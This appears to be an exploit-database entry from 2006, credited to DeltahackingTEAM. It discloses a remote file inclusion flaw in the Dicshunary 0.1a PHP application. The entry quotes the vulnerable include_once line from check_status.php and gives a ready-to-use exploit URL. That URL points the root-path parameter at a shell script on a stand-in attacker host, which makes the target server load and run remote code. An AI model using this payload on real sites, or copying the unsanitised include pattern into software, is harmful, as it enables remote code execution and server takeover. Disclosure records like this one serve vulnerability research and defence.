Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability

2006-11-17T00:00:00
ID 1337DAY-ID-1178
Type zdt
Reporter DeltahackingTEAM
Modified 2006-11-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability
====================================================================




**********************************************************************************************************

* Portal Name :dicshunary 0.1 alpha

* Class = Remote File Inclusion ;

* Found by = DeltahackingTEAM

* User In Delta Team (TAnha & Dr.Pantagon )

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

include_once($dicshunary_root_path.'common.inc');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,

**********************************************************************************************************


#  0day.today [2018-01-04]  #